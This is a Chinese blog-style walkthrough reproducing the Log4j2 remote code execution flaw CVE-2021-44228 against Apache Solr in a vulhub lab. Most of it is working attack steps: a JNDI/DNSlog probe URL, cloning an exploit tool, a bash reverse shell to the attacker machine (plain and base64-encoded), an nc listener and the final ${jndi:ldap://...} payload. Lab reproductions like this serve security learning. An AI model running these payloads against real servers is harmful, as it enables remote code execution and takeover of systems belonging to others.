本文主要是介绍[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
CVE-2021-44228漏洞复现
漏洞简介
Apache Log4j2是Apache软件基金会下的一个开源的基于java的日志记录工具。该远程代码执行漏洞基于攻击者使用${}关键标识触发JNDI注入漏洞,可以执行任意代码。
漏洞复现
靶机:192.168.74.150
攻击机:192.168.74.148
启动docker
docker-compose
docker ps
查看docker所在进程,如图所示
在kali火狐浏览器中打开,显示此界面为成功
获得一个临时的DNS,这里是网站。
在浏览器中输入 http://192.168.74.150:5005/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.armp2a.dnslog.cn}
如图,成功回显java版本号
在攻击机中下载注入工具 git clone https://github.com/bkfish/Apache-Log4j-Learning.git
bash -i >& /dev/tcp/192.168.74.148/19999 0>&1
在攻击机上开启端口监听 nc -lvvp 19999
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljc0LjE0OC8xOTk5OSAwPiYx}|{base64,-d}|{bash,-i}" -A "192.168.74.148"
#直接运行并在攻击机中开启监听
http://192.168.74.150:8983/solr/admin/cores?action=${jndi:ldap://192.168.74.148:1389/jas9lj}
随机选择一个直接使用即可
如图即表示渗透成功!
养成好习惯,用完记得关闭:docker-compose down
待完善…
这篇关于[CVE-2021-44228]:log4j2漏洞复现流程详解(vulhub环境)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!